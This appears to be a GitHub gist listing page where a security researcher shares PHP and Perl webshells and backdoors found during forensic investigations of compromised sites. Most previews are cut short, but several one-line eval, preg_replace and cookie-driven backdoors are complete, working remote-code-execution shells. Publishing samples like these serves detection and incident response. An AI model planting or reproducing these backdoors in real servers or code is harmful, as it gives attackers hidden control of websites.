jonaslejon’s gists

jonaslejon / Iicense.php

Last active December 20, 2024 17:27

Magic Include Shell PHP Backdoor found at customer site


	<?php
	error_reporting(0);
	$ver = '6.6.6';
	$my_keyw = $_SERVER['HTTP_USER_AGENT'];
	$items_per_page = 50;
	$admin_name = '27a0e2015f9087981c0b95a29fc4ba57';
	$admin_pass = '9413c48772f73d5c305b65eb58a06f9c';

	if($my_keyw=='spaumbot')

jonaslejon / gist:83e58a487456127792c6

Last active June 24, 2018 09:14

keybase.md

	### Keybase proof

	I hereby claim:

	* I am jonaslejon on github.
	* I am jonaslejon (https://keybase.io/jonaslejon) on keybase.
	* I have a public key ASD1npZDNt8vxdD8n7zAoGKJ3RbSpFrSI1NBTFOp8MQjFAo

	To claim this, I am signing this object:

jonaslejon / cgi.pl

Created October 24, 2015 10:57

Perl www backdoor

	#!/usr/bin/perl
	#PPS 3.0 shell by Pashkela [RDOT.ORG] © 2012
	$Password="bb09c55983ff49f3a9cdfd83f08e5689";# root
	$CommandTimeoutDuration=30;# max time of command execution
	$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex
	);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&
	1 1>&2":" 1>&1 2>&1");$LogFlag=false;use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return
	$url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;local($i,$loc,$key,$val);$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form
	-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST")

jonaslejon / wp-mailer-malware.php

Created December 11, 2015 15:48

Mass mailing malware found in WordPress installation

	@ini_set('error_log', NULL);
	@ini_set('log_errors', 0);
	@ini_set('max_execution_time', 0);
	@set_time_limit(0);

	if(isset($_SERVER))
	{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))

jonaslejon / php-backdoor.php

Created January 8, 2016 12:11

PHP Backdoor found during forensic investigation

jonaslejon / php-upload.php

Created January 8, 2016 12:15

PHP file upload backdoor found during forensic investigation

	<?php
	ini_set('display_errors','Off');
	error_reporting('E_ALL');
	$multipart = "236c985403e7e1";
	$part = "450be30e0288de41b6";
	if (md5($_POST['multipart'])==$multipart.$part){
	echo '
	<div align="left">
	<font size="1">:</font>
	</div>

jonaslejon / web-backdoor.php

Created January 11, 2016 17:01

Web PHP Malware found during forensic investigation

	<?php

	eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%

jonaslejon / PHP-cookie-backdoor.php

Last active February 27, 2023 05:10

This is a PHP COOKIE backdoor that was found during a forensic investigation

jonaslejon / php-preg-replace-backdoor.php

Created February 10, 2016 20:11

Short PHP backdoor using preg_replace. Found during forensic investigation

<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');

jonaslejon / file-upload.php

Created February 10, 2016 20:19

PHP file upload backdoor

	<?php
	$self = $_SERVER['PHP_SELF'];
	$docr = $_SERVER['DOCUMENT_ROOT'];
	$sern = $_SERVER['SERVER_NAME'];
	$tend = "</tr></form></table><br><br><br><br>";
	if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
	elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
	else {$ac = "upload";}
	switch($ac) {
	case "upload":

	<?php

	$ecp=$_COOKIE;
	$llm=$ecp[inwm];
	if($llm){
	$zkm=$llm($ecp[xlvd]);$ewgp=$llm($ecp[avkw]);$uxt=$zkm("",$ewgp);$uxt();
	}

Jonas Lejon jonaslejon